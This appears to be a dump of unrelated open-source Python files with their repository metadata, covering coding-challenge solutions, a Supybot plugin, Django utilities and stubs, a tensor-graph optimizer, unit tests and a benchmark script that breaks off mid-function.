#https://www.hackerrank.com/challenges/picking-numbers/problem
def pickingNumbers(n, a):
dictionary = {}
for element in a:
value = dictionary.get(element, "None")
if value == "None":
dictionary[element] = 1
else:
dictionary[element] = int(value) + 1
list_d = list(dictionary.items())
list_d.sort()
#print(list_d)
if len(list_d) == 1:
return list_d[0][1]
max = 0
for i in range(len(list_d)):
if max < list_d[i][1]:
max = list_d[i][1]
for i in range(len(list_d) - 1):
if abs(list_d[i][0] - list_d[i + 1][0]) == 1:
add_result = list_d[i][1] + list_d[i + 1][1]
if max < add_result:
max = add_result
return max
n = int(input().strip())
a = [int(a_temp) for a_temp in input().strip().split(' ')]
count = pickingNumbers(n, a)
print(count)
|
[
"saumya.singh0993@gmail.com"
] |
saumya.singh0993@gmail.com
|
d3c4ff20dda9054f73a27d12749f649b646cc97c
|
0791b310393b0a88ae03e05593abf921e1920951
|
/resourses/convertui.py
|
5653855d28da8e3db4670c41f89c569103ed4a0c
|
[
"MIT"
] |
permissive
|
sashgorokhov-heaven/python-vkontakte-music-gui-old
|
482ae8f84e43abbc1137f920fe445a67d81522a3
|
b57d80686d404292a35d9055ba43b0da0e5aaab2
|
refs/heads/master
| 2021-06-01T04:30:05.525614
| 2014-06-24T16:42:08
| 2014-06-24T16:42:08
| 20,318,424
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 885
|
py
|
__author__ = 'sashgorokhov'
__email__ = 'sashgorokhov@gmail.com'
import os, time
os.startfile('convertui.cmd')
files = [
r'..\modules\forms\downloadform\ui.py',
r'..\modules\forms\mainform\ui.py',
r'..\modules\forms\mainform\components\audiolist\components\audiolistitemwidget\ui.py',
r'..\modules\forms\downloadform\components\audiolist\components\audiolistitemwidget\ui.py'
]
time.sleep(3)
for file in files:
with open(file, 'r') as f:
lines = f.read().split('\n')
lines.reverse()
parsed = list()
found = False
for line in lines:
if line == 'import resourses_rc':
if found:
continue
found = True
parsed.append('import resourses.resourses_rc')
else:
parsed.append(line)
parsed.reverse()
with open(file, 'w') as f:
f.write('\n'.join(parsed))
|
[
"sashgorokhov@gmail.com"
] |
sashgorokhov@gmail.com
|
facebbe13610d58711da7060347d0e724d170152
|
4427916fafe69a32626cb5d8c02bc55c7c87f642
|
/FortyTwo/plugin.py
|
df71696ddb0010cbf8d1a2244f0c02d37bdc3f81
|
[] |
no_license
|
ki113d/Supybot-plugins
|
13f91f2fe0c01c9769a562e3d480d4f0e7fa8739
|
0d6b4447004b822acbe41fd7075cc85d8476a289
|
refs/heads/master
| 2021-04-15T07:57:27.272322
| 2012-12-30T21:35:56
| 2012-12-30T21:35:56
| 4,077,461
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,562
|
py
|
###
# Copyright (c) 2011, Valentin Lorentz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import re
import time
import fnmatch
from xml.dom import minidom
import supybot.utils as utils
from supybot.commands import *
import supybot.plugins as plugins
import supybot.ircutils as ircutils
import supybot.callbacks as callbacks
try:
from supybot.i18n import PluginInternationalization
from supybot.i18n import internationalizeDocstring
_ = PluginInternationalization('FortyTwo')
except:
# This are useless functions that's allow to run the plugin on a bot
# without the i18n plugin
_ = lambda x:x
internationalizeDocstring = lambda x:x
class Domain:
def __init__(self, dom, warnings):
self.domain = None
self.purpose = None
for node in dom.childNodes:
if not node.nodeName in 'domain purpose'.split():
warnings.append(_("Unknown node '%s'") % node.nodeName)
continue
try:
data = node.firstChild.data
except AttributeError:
# Empty purpose, for instance
data = ''
self.__dict__.update({node.nodeName: data})
assert None not in (self.domain, self.purpose)
@internationalizeDocstring
class FortyTwo(callbacks.Plugin):
"""Add the help for "@plugin help 42Chan" here
This should describe *how* to use this plugin."""
@internationalizeDocstring
def find(self, irc, msg, args, optlist):
"""[--domain <glob>] [--purpose <glob>]
Returns all the domains that matches the search. --domain and
--purpose take a glob (a string with wildcards) that have to match
the results, --resolves means the domain is resolved, and --http is
the HTTP response status (000 for a domain that isn't resolved)."""
def translate(glob):
return re.compile(fnmatch.translate(glob), re.I)
domain, purpose = translate('*'), translate('*')
resolve, http = None, None
for name, value in optlist:
if name == 'domain': domain = translate(value)
if name == 'purpose': purpose = translate(value)
if not hasattr(self, '_lastRefresh') or \
self._lastRefresh<time.time()-self.registryValue('lifetime'):
self._refreshCache()
results = []
for obj in self._domains:
if not domain.match(obj.domain) or not purpose.match(obj.purpose):
continue
results.append(obj.domain)
if results == []:
irc.error(_('No such domain'))
else:
irc.reply(_(', ').join(results))
find = wrap(find, [getopts({'domain': 'glob', 'purpose': 'glob'})])
@internationalizeDocstring
def fetch(self, irc, msg, args):
"""takes no arguments
Fetches data from the domains list source."""
self._refreshCache()
irc.replySuccess()
@internationalizeDocstring
def purpose(self, irc, msg, args, domain):
"""<domain>
Returns the purpose of the given domain."""
if not hasattr(self, '_lastRefresh') or \
self._lastRefresh<time.time()-self.registryValue('lifetime'):
self._refreshCache()
for obj in self._domains:
if obj.domain == domain:
irc.reply(obj.purpose)
return
irc.error(_('No such domain'))
purpose = wrap(purpose, ['somethingWithoutSpaces'])
def _refreshCache(self):
self._lastRefresh = time.time()
xml = utils.web.getUrl(self.registryValue('source'))
dom = minidom.parseString(xml)
warnings = []
root = None
for child in dom.childNodes:
if child.nodeName == 'domains':
root = child
break
assert root is not None
self._domains = [Domain(child, warnings) for child in root.childNodes
if child.nodeName == 'item']
Class = FortyTwo
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
[
"progval@gmail.com"
] |
progval@gmail.com
|
39f23942de022147dd5876c2b5e9383005d57383
|
bb970bbe151d7ac48d090d86fe1f02c6ed546f25
|
/arouse/_dj/utils/_os.py
|
4f586b4c0305d41a7a7a672366300d62577ff519
|
[
"Python-2.0",
"BSD-3-Clause"
] |
permissive
|
thektulu/arouse
|
95016b4028c2b8e9b35c5062a175ad04286703b6
|
97cadf9d17c14adf919660ab19771a17adc6bcea
|
refs/heads/master
| 2021-01-13T12:51:15.888494
| 2017-01-09T21:43:32
| 2017-01-09T21:43:32
| 78,466,406
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,593
|
py
|
from __future__ import unicode_literals
import os
import sys
import tempfile
from os.path import abspath, dirname, isabs, join, normcase, normpath, sep
from arouse._dj.core.exceptions import SuspiciousFileOperation
from arouse._dj.utils import six
from arouse._dj.utils.encoding import force_text
if six.PY2:
fs_encoding = sys.getfilesystemencoding() or sys.getdefaultencoding()
# Under Python 2, define our own abspath function that can handle joining
# unicode paths to a current working directory that has non-ASCII characters
# in it. This isn't necessary on Windows since the Windows version of abspath
# handles this correctly. It also handles drive letters differently than the
# pure Python implementation, so it's best not to replace it.
if six.PY3 or os.name == 'nt':
abspathu = abspath
else:
def abspathu(path):
"""
Version of os.path.abspath that uses the unicode representation
of the current working directory, thus avoiding a UnicodeDecodeError
in join when the cwd has non-ASCII characters.
"""
if not isabs(path):
path = join(os.getcwdu(), path)
return normpath(path)
def upath(path):
"""
Always return a unicode path.
"""
if six.PY2 and not isinstance(path, six.text_type):
return path.decode(fs_encoding)
return path
def npath(path):
"""
Always return a native path, that is unicode on Python 3 and bytestring on
Python 2.
"""
if six.PY2 and not isinstance(path, bytes):
return path.encode(fs_encoding)
return path
def safe_join(base, *paths):
"""
Joins one or more path components to the base path component intelligently.
Returns a normalized, absolute version of the final path.
The final path must be located inside of the base path component (otherwise
a ValueError is raised).
"""
base = force_text(base)
paths = [force_text(p) for p in paths]
final_path = abspathu(join(base, *paths))
base_path = abspathu(base)
# Ensure final_path starts with base_path (using normcase to ensure we
# don't false-negative on case insensitive operating systems like Windows),
# further, one of the following conditions must be true:
# a) The next character is the path separator (to prevent conditions like
# safe_join("/dir", "/../d"))
# b) The final path must be the same as the base path.
# c) The base path must be the most root path (meaning either "/" or "C:\\")
if (not normcase(final_path).startswith(normcase(base_path + sep)) and
normcase(final_path) != normcase(base_path) and
dirname(normcase(base_path)) != normcase(base_path)):
raise SuspiciousFileOperation(
'The joined path ({}) is located outside of the base path '
'component ({})'.format(final_path, base_path))
return final_path
def symlinks_supported():
"""
A function to check if creating symlinks are supported in the
host platform and/or if they are allowed to be created (e.g.
on Windows it requires admin permissions).
"""
tmpdir = tempfile.mkdtemp()
original_path = os.path.join(tmpdir, 'original')
symlink_path = os.path.join(tmpdir, 'symlink')
os.makedirs(original_path)
try:
os.symlink(original_path, symlink_path)
supported = True
except (OSError, NotImplementedError, AttributeError):
supported = False
else:
os.remove(symlink_path)
finally:
os.rmdir(original_path)
os.rmdir(tmpdir)
return supported
|
[
"michal.s.zukowski@gmail.com"
] |
michal.s.zukowski@gmail.com
|
7ea6777f121d25cecdd3df4ad37bc8958faa33f6
|
f82349a5d9cb285ced7c52db1ce95c65f5fd0cf0
|
/mars/tensor/execution/optimizes/ne.py
|
34e7ee8d39dbabd98b8b5eb609277840c853c493
|
[
"MIT",
"BSD-3-Clause",
"OFL-1.1",
"LicenseRef-scancode-unknown-license-reference",
"Python-2.0",
"Apache-2.0",
"BSD-2-Clause"
] |
permissive
|
pingrunhuang/mars
|
8d2602356b6f4d9eb7c6dfe4b2c4536b4bdfc229
|
ae920c374e9844d7426d0cc09c0d97059dc5341c
|
refs/heads/master
| 2020-04-17T03:42:11.147774
| 2019-01-18T06:49:29
| 2019-01-18T06:49:29
| 166,196,676
| 0
| 0
|
Apache-2.0
| 2019-01-17T09:17:25
| 2019-01-17T09:17:25
| null |
UTF-8
|
Python
| false
| false
| 4,936
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2018 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ...expressions import arithmetic, reduction
from ...expressions.fuse import TensorNeFuseChunk
REDUCTION_OP = {reduction.TensorSum, reduction.TensorProd,
reduction.TensorMax, reduction.TensorMin}
SUPPORT_OP = {
arithmetic.TensorAdd, arithmetic.TensorAddConstant,
arithmetic.TensorSubtract, arithmetic.TensorSubConstant,
arithmetic.TensorMultiply, arithmetic.TensorMulConstant,
arithmetic.TensorDivide, arithmetic.TensorDivConstant,
arithmetic.TensorPower, arithmetic.TensorPowConstant,
arithmetic.TensorMod, arithmetic.TensorModConstant,
arithmetic.TensorNegative,
arithmetic.TensorAbs,
arithmetic.TensorConj,
arithmetic.TensorExp,
arithmetic.TensorLog,
arithmetic.TensorLog10,
arithmetic.TensorExpm1,
arithmetic.TensorLog1p,
arithmetic.TensorSqrt,
arithmetic.TensorEqual, arithmetic.TensorEqConstant,
arithmetic.TensorNotEqual, arithmetic.TensorNeConstant,
arithmetic.TensorLessThan, arithmetic.TensorLtConstant,
arithmetic.TensorLessEqual, arithmetic.TensorLeConstant,
arithmetic.TensorGreaterThan, arithmetic.TensorGtConstant,
arithmetic.TensorGreaterEqual, arithmetic.TensorGeConstant,
arithmetic.TensorSin,
arithmetic.TensorCos,
arithmetic.TensorTan,
arithmetic.TensorArcsin,
arithmetic.TensorArccos,
arithmetic.TensorArctan,
arithmetic.TensorSinh,
arithmetic.TensorCosh,
arithmetic.TensorTanh,
arithmetic.TensorArcsinh,
arithmetic.TensorArccosh,
arithmetic.TensorArctanh,
arithmetic.TensorLshift, arithmetic.TensorLshiftConstant,
arithmetic.TensorRshift, arithmetic.TensorRshiftConstant,
arithmetic.TensorTreeAdd,
arithmetic.TensorTreeMultiply,
reduction.TensorSum,
reduction.TensorProd,
reduction.TensorMax,
reduction.TensorMin
}
def _check_reduction_axis(node):
return len(node.op.axis) == 1 or len(node.op.axis) == node.ndim
def _support(node):
op_type = type(node.op)
if op_type in REDUCTION_OP:
return _check_reduction_axis(node)
return op_type in SUPPORT_OP
def _transfer_op(node):
op = node.op
if type(op) in REDUCTION_OP and not _check_reduction_axis(node):
return op
return op
class NeOptimizer(object):
def __init__(self, graph):
self._graph = graph
def optimize(self, keys=None):
self.compose(keys=keys)
def _compose_graph(self, composes):
graph = self._graph
composed_nodes = []
for c in composes:
head_node = c[0]
tail_node = c[-1]
op = TensorNeFuseChunk(dtype=tail_node.dtype)
composed_chunk = op(c)
graph.add_node(composed_chunk)
for node in graph.iter_successors(tail_node):
graph.add_edge(composed_chunk, node)
for node in graph.iter_predecessors(head_node):
graph.add_edge(node, composed_chunk)
for node in c:
graph.remove_node(node)
composed_nodes.append(composed_chunk)
return composed_nodes
def compose(self, keys=None):
composes = []
explored = set()
keys = set(keys or [])
graph = self._graph
for v in graph.bfs():
if v.op.gpu or v.op.sparse:
# break out
return []
if type(v.op) not in SUPPORT_OP or v.key in keys:
continue
if v in explored or type(v.op) in REDUCTION_OP: # TODO: check logic here
continue
if graph.count_successors(v) != 1:
continue
selected = [v]
# add successors
cur_node = graph.successors(v)[0]
while graph.count_predecessors(cur_node) == 1\
and _support(cur_node) and cur_node.key not in keys:
selected.append(cur_node)
if graph.count_successors(cur_node) != 1 \
or type(cur_node.op) in REDUCTION_OP:
break
else:
cur_node = graph.successors(cur_node)[0]
if len(selected) > 1:
explored.update(selected)
composes.append(list(selected))
return self._compose_graph(composes)
|
[
"xuye.qin@alibaba-inc.com"
] |
xuye.qin@alibaba-inc.com
|
84246ba2dc3ebc23ea5633a69655136b4e07164e
|
2ada0217e09e02c6d1ab1af6c12c1262eb66ea06
|
/NTWebsite/migrations/0033_auto_20190518_1729.py
|
73af9010eb07ba2cb93c8ef71bfd283d8ac97d07
|
[] |
no_license
|
lianglianggou/Django-Python-NagetiveWeb-Beta
|
74545d2f19d7a65b974e7b88c06cbe1bae450568
|
e19175d14541debf59d6ea1223fef54727bd2150
|
refs/heads/master
| 2021-01-07T00:43:16.696519
| 2019-12-12T14:02:13
| 2019-12-12T14:02:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,028
|
py
|
# Generated by Django 2.0.6 on 2019-05-18 09:29
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('NTWebsite', '0032_auto_20190518_1714'),
]
operations = [
migrations.AlterField(
model_name='commentattitude',
name='ObjectID',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='NTWebsite.CommentInfo', verbose_name='评论'),
),
migrations.AlterField(
model_name='commentinfo',
name='TopicID',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='NTWebsite.TopicInfo', verbose_name='文章'),
),
migrations.AlterField(
model_name='topicattitude',
name='ObjectID',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='NTWebsite.TopicInfo', verbose_name='文章'),
),
]
|
[
"616604060@qq.com"
] |
616604060@qq.com
|
53df6c2ebd3e371dd21d207caaa24b7293593289
|
fa7e75212e9f536eed7a78237a5fa9a4021a206b
|
/python/smqtk/tests/representation/DataElement/test_DataElement_abstract.py
|
80492106247f0fbfc59c332c3d5f27c062eb74f8
|
[] |
no_license
|
kod3r/SMQTK
|
3d40730c956220a3d9bb02aef65edc8493bbf527
|
c128e8ca38c679ee37901551f4cc021cc43d00e6
|
refs/heads/master
| 2020-12-03T09:12:41.163643
| 2015-10-19T14:56:55
| 2015-10-19T14:56:55
| 44,916,678
| 1
| 0
| null | 2015-10-25T15:47:35
| 2015-10-25T15:47:35
| null |
UTF-8
|
Python
| false
| false
| 8,164
|
py
|
"""
Tests for DataElement abstract interface class methods that provide
functionality.
"""
import hashlib
import mock
import nose.tools as ntools
import os.path as osp
import tempfile
import unittest
import smqtk.representation.data_element
__author__ = "paul.tunison@kitware.com"
# because this has a stable mimetype conversion
EXPECTED_CONTENT_TYPE = "image/png"
EXPECTED_BYTES = "hello world"
EXPECTED_UUID = 1234567890
EXPECTED_MD5 = hashlib.md5(EXPECTED_BYTES).hexdigest()
EXPECTED_SHA1 = hashlib.sha1(EXPECTED_BYTES).hexdigest()
# Caches the temp directory before we start mocking things out that would
# otherwise be required for the tempfile module to determine the temp directory.
tempfile.gettempdir()
class DummyDataElement (smqtk.representation.data_element.DataElement):
# abstract methods have no base functionality
def get_config(self):
return {}
def content_type(self):
return EXPECTED_CONTENT_TYPE
def get_bytes(self):
# Aligned with the checksum strings in test class setUp method
return EXPECTED_BYTES
def uuid(self):
return EXPECTED_UUID
class TestDataElementAbstract (unittest.TestCase):
def test_md5(self):
de = DummyDataElement()
ntools.assert_is_none(de._md5_cache)
md5 = de.md5()
sha1 = de.sha1()
ntools.assert_is_not_none(de._md5_cache)
ntools.assert_equal(de._md5_cache, EXPECTED_MD5)
ntools.assert_equal(md5, EXPECTED_MD5)
ntools.assert_equal(de._sha1_cache, EXPECTED_SHA1)
ntools.assert_equal(sha1, EXPECTED_SHA1)
# When called a second time, should use cache instead of recomputing
with mock.patch("smqtk.representation.data_element.hashlib") as mock_hashlib:
md5 = de.md5()
ntools.assert_false(mock_hashlib.md5.called)
ntools.assert_equal(md5, EXPECTED_MD5)
sha1 = de.sha1()
ntools.assert_false(mock_hashlib.sha1.called)
ntools.assert_equal(sha1, EXPECTED_SHA1)
def test_del(self):
de = DummyDataElement()
m_clean_temp = de.clean_temp = mock.Mock()
del de
ntools.assert_true(m_clean_temp.called)
def test_hashing(self):
# Hash should be that of the UUID of the element
de = DummyDataElement()
ntools.assert_equal(hash(de), hash(EXPECTED_UUID))
# Cases:
# - no existing temps, no specific dir
# - no existing temps, given specific dir
# - existing temps, no specific dir
# - existing temps, given specific dir
#
# Mocking open, os.open, os.close and fcntl to actual file interaction
# - os.open is used under the hood of tempfile to open a file (which also
# creates it on disk).
@mock.patch('smqtk.representation.data_element.file_utils.safe_create_dir')
@mock.patch('fcntl.fcntl') # global
@mock.patch('os.close') # global
@mock.patch('os.open') # global
@mock.patch('__builtin__.open')
def test_writeTemp_noExisting_noDir(self,
mock_open, mock_os_open, mock_os_close,
mock_fcntl, mock_scd):
# no existing temps, no specific dir
fp = DummyDataElement().write_temp()
ntools.assert_false(mock_scd.called)
ntools.assert_true(mock_open.called)
ntools.assert_equal(osp.dirname(fp), tempfile.gettempdir())
@mock.patch('smqtk.representation.data_element.file_utils.safe_create_dir')
@mock.patch('fcntl.fcntl') # global
@mock.patch('os.close') # global
@mock.patch('os.open') # global
@mock.patch('__builtin__.open')
def test_writeTemp_noExisting_givenDir(self,
mock_open, mock_os_open,
mock_os_close, mock_fcntl, mock_scd):
# no existing temps, given specific dir
target_dir = '/some/dir/somewhere'
fp = DummyDataElement().write_temp(target_dir)
mock_scd.assert_called_once_with(target_dir)
ntools.assert_true(mock_open.called)
ntools.assert_not_equal(osp.dirname(fp), tempfile.gettempdir())
ntools.assert_equal(osp.dirname(fp), target_dir)
@mock.patch('smqtk.representation.data_element.file_utils.safe_create_dir')
@mock.patch('fcntl.fcntl') # global
@mock.patch('os.close') # global
@mock.patch('os.open') # global
@mock.patch('__builtin__.open')
def test_writeTemp_hasExisting_noDir(self,
mock_open, mock_os_open, mock_os_close,
mock_fcntl, mock_scd):
# existing temps, no specific dir
prev_0 = '/tmp/file.txt'
prev_1 = '/tmp/file_two.png'
de = DummyDataElement()
de._temp_filepath_stack.append(prev_0)
de._temp_filepath_stack.append(prev_1)
fp = de.write_temp()
ntools.assert_false(mock_scd.called)
ntools.assert_false(mock_open.called)
ntools.assert_equal(fp, prev_1)
@mock.patch('smqtk.representation.data_element.file_utils.safe_create_dir')
@mock.patch('fcntl.fcntl') # global
@mock.patch('os.close') # global
@mock.patch('os.open') # global
@mock.patch('__builtin__.open')
def test_writeTemp_hasExisting_givenNewDir(self, mock_open, mock_os_open,
mock_os_close, mock_fcntl,
mock_scd):
# existing temps, given specific dir
prev_0 = '/tmp/file.txt'
prev_1 = '/tmp/file_two.png'
target_dir = '/some/specific/dir'
de = DummyDataElement()
de._temp_filepath_stack.append(prev_0)
de._temp_filepath_stack.append(prev_1)
fp = de.write_temp(temp_dir=target_dir)
ntools.assert_true(mock_scd.called)
ntools.assert_true(mock_open.called)
ntools.assert_equal(osp.dirname(fp), target_dir)
@mock.patch('smqtk.representation.data_element.file_utils.safe_create_dir')
@mock.patch('fcntl.fcntl') # global
@mock.patch('os.close') # global
@mock.patch('os.open') # global
@mock.patch('__builtin__.open')
def test_writeTemp_hasExisting_givenExistingDir(self, mock_open,
mock_os_open, mock_os_close,
mock_fcntl, mock_scd):
# existing temps, given specific dir already in stack
prev_0 = '/dir1/file.txt'
prev_1 = '/tmp/things/file_two.png'
prev_2 = '/some/specific/dir'
de = DummyDataElement()
de._temp_filepath_stack.append(prev_0)
de._temp_filepath_stack.append(prev_1)
de._temp_filepath_stack.append(prev_2)
target_dir = "/tmp/things"
fp = de.write_temp(temp_dir=target_dir)
ntools.assert_false(mock_scd.called)
ntools.assert_false(mock_open.called)
ntools.assert_equal(fp, prev_1)
@mock.patch("smqtk.representation.data_element.os")
def test_cleanTemp_noTemp(self, mock_os):
# should do all of nothing
de = DummyDataElement()
de.clean_temp()
ntools.assert_false(mock_os.path.isfile.called)
ntools.assert_false(mock_os.remove.called)
@mock.patch("smqtk.representation.data_element.os")
def test_cleanTemp_hasTemp_badPath(self, mock_os):
de = DummyDataElement()
de._temp_filepath_stack.append('tmp/thing')
mock_os.path.isfile.return_value = False
de.clean_temp()
mock_os.path.isfile.assert_called_once_with('tmp/thing')
ntools.assert_false(mock_os.remove.called)
@mock.patch("smqtk.representation.data_element.os")
def test_cleanTemp_hasTemp_validPath(self, mock_os):
expected_path = '/tmp/something'
de = DummyDataElement()
de._temp_filepath_stack.append(expected_path)
mock_os.path.isfile.return_value = True
de.clean_temp()
mock_os.path.isfile.assert_called_once_with(expected_path)
mock_os.remove.assert_called_once_with(expected_path)
|
[
"paul.tunison@kitware.com"
] |
paul.tunison@kitware.com
|
e1361bf2b8bd4dd6a0afeb1667b5967a9269d8a3
|
159d4ae61f4ca91d94e29e769697ff46d11ae4a4
|
/venv/lib/python3.9/site-packages/jedi/third_party/django-stubs/django-stubs/utils/datastructures.pyi
|
7b5f7b2d182a86676ef63a639789ad5293c52f11
|
[
"MIT"
] |
permissive
|
davidycliao/bisCrawler
|
729db002afe10ae405306b9eed45b782e68eace8
|
f42281f35b866b52e5860b6a062790ae8147a4a4
|
refs/heads/main
| 2023-05-24T00:41:50.224279
| 2023-01-22T23:17:51
| 2023-01-22T23:17:51
| 411,470,732
| 8
| 0
|
MIT
| 2023-02-09T16:28:24
| 2021-09-28T23:48:13
|
Python
|
UTF-8
|
Python
| false
| false
| 2,624
|
pyi
|
from typing import (
Any,
Callable,
Dict,
Iterable,
List,
Mapping,
MutableMapping,
MutableSet,
Tuple,
TypeVar,
Union,
overload,
Iterator,
Optional,
)
from typing_extensions import Literal
_K = TypeVar("_K")
_V = TypeVar("_V")
class OrderedSet(MutableSet[_K]):
dict: Dict[_K, None] = ...
def __init__(self, iterable: Optional[Iterable[_K]] = ...) -> None: ...
def __contains__(self, item: object) -> bool: ...
def __iter__(self) -> Iterator[_K]: ...
def __len__(self) -> int: ...
def add(self, x: _K) -> None: ...
def discard(self, item: _K) -> None: ...
class MultiValueDictKeyError(KeyError): ...
_D = TypeVar("_D", bound="MultiValueDict")
class MultiValueDict(MutableMapping[_K, _V]):
@overload
def __init__(self, key_to_list_mapping: Mapping[_K, Optional[List[_V]]] = ...) -> None: ...
@overload
def __init__(self, key_to_list_mapping: Iterable[Tuple[_K, List[_V]]] = ...) -> None: ...
def getlist(self, key: _K, default: Any = ...) -> List[_V]: ...
def setlist(self, key: _K, list_: List[_V]) -> None: ...
def setlistdefault(self, key: _K, default_list: Optional[List[_V]] = ...) -> List[_V]: ...
def appendlist(self, key: _K, value: _V) -> None: ...
def lists(self) -> Iterable[Tuple[_K, List[_V]]]: ...
def dict(self) -> Dict[_K, Union[_V, List[_V]]]: ...
def copy(self: _D) -> _D: ...
# These overrides are needed to convince mypy that this isn't an abstract class
def __delitem__(self, item: _K) -> None: ...
def __getitem__(self, item: _K) -> Union[_V, Literal[[]]]: ... # type: ignore
def __setitem__(self, k: _K, v: Union[_V, List[_V]]) -> None: ...
def __len__(self) -> int: ...
def __iter__(self) -> Iterator[_K]: ...
class ImmutableList(Tuple[_V, ...]):
warning: str = ...
def __init__(self, *args: Any, warning: str = ..., **kwargs: Any) -> None: ...
def complain(self, *wargs: Any, **kwargs: Any) -> None: ...
class DictWrapper(Dict[str, _V]):
func: Callable[[_V], _V] = ...
prefix: str = ...
@overload
def __init__(self, data: Mapping[str, _V], func: Callable[[_V], _V], prefix: str) -> None: ...
@overload
def __init__(self, data: Iterable[Tuple[str, _V]], func: Callable[[_V], _V], prefix: str) -> None: ...
_T = TypeVar("_T", bound="CaseInsensitiveMapping")
class CaseInsensitiveMapping(Mapping):
def __init__(self, data: Any) -> None: ...
def __getitem__(self, key: str) -> Any: ...
def __len__(self) -> int: ...
def __iter__(self) -> Iterator[str]: ...
def copy(self: _T) -> _T: ...
|
[
"davidycliao@gmail.com"
] |
davidycliao@gmail.com
|
d9bd2890dfcfbc0a88d99138185203be8d152d8b
|
13d8ede6d23ed0a375bbc9310d93be035fd164e9
|
/InterviewBits/arrays/flip.py
|
f9d5783e746d6b7c2e6a9d020b5caec7cd947ea2
|
[] |
no_license
|
iamrishap/PythonBits
|
192d3fb7bce101485eb81da2153e5b0c82b6872a
|
dcbc5f087ad78110a98e78dd6e5943ed971309c2
|
refs/heads/master
| 2022-03-10T07:16:08.601170
| 2019-11-17T04:01:00
| 2019-11-17T04:01:00
| 206,778,724
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,038
|
py
|
"""
You are given a binary string(i.e. with characters 0 and 1) S consisting of characters S1, S2, …, SN.
In a single operation, you can choose two indices L and R such that 1 ≤ L ≤ R ≤ N and
flip the characters SL, SL+1, …, SR. By flipping, we mean change character 0 to 1 and vice-versa.
Your aim is to perform ATMOST one operation such that in final string number of 1s is maximised.
If you don’t want to perform the operation, return an empty array. Else, return an array consisting of two
elements denoting L and R. If there are multiple solutions, return the lexicographically smallest pair of L and R.
Notes:
Pair (a, b) is lexicographically smaller than pair (c, d) if a < c or, if a == c and b < d.
For example,
S = 010
Pair of [L, R] | Final string
_______________|_____________
[1 1] | 110
[1 2] | 100
[1 3] | 101
[2 2] | 000
[2 3] | 001
We see that two pairs [1, 1] and [1, 3] give same number of 1s in final string. So, we return [1, 1].
Another example,
If S = 111
No operation can give us more than three 1s in final string. So, we return empty array [].
"""
# Say it has A 0s and B 1s. Eventually, there are B 0s and A 1s.
# So, number of 1s increase by A - B. We want to choose a subarray which maximises this.
# Note, if we change 1s to -1, then sum of values will give us A - B.
# Then, we have to find a subarray with maximum sum, which can be done via Kadane’s Algorithm.
class Solution:
# @param A : string
# @return a list of integers
def flip(self, A):
max_diff = 0
diff = 0
start = 0
ans = None
for i, a in enumerate(A):
diff += (1 if a is '0' else -1)
if diff < 0:
diff = 0
start = i + 1
continue
if diff > max_diff:
max_diff = diff
ans = [start, i]
if ans is None:
return []
return list(map(lambda x: x + 1, ans))
s = Solution()
print(s.flip('010'))
|
[
"rishap.sharma@iress.com"
] |
rishap.sharma@iress.com
|
a27ec35f7aa311ffa7144d14cdcef4c0bea23acd
|
4bebd76e65768c6a2fe9f8019c99ae9e579dbafd
|
/scripts/LAPipe/NumPy/PART2/P2.10RW.py
|
c37313dde9fcf99a541e71b68a800c74863e1648
|
[] |
no_license
|
hadad-paper/HADAD_SIGMOD2021
|
7e0f7687bfdb3601b817570a2c10c2b923970fd9
|
6bfef6838a5549288adca6bdd71ec0d3497d3f2e
|
refs/heads/master
| 2023-03-05T22:54:36.894263
| 2021-02-22T23:24:43
| 2021-02-22T23:24:43
| 296,177,486
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,159
|
py
|
with open(__file__) as fh: print fh.read()
import os
import sys
import datetime
import time
import numpy as np
import numpy.linalg as alg
import pandas as pd
from numpy import genfromtxt
def timeOp(string,cleanup=None):
times = []
time_stamp = datetime.datetime.fromtimestamp(
time.time()).strftime('%Y%m%d%H%M%S')
for ix in range(5):
try:
start = time.time()
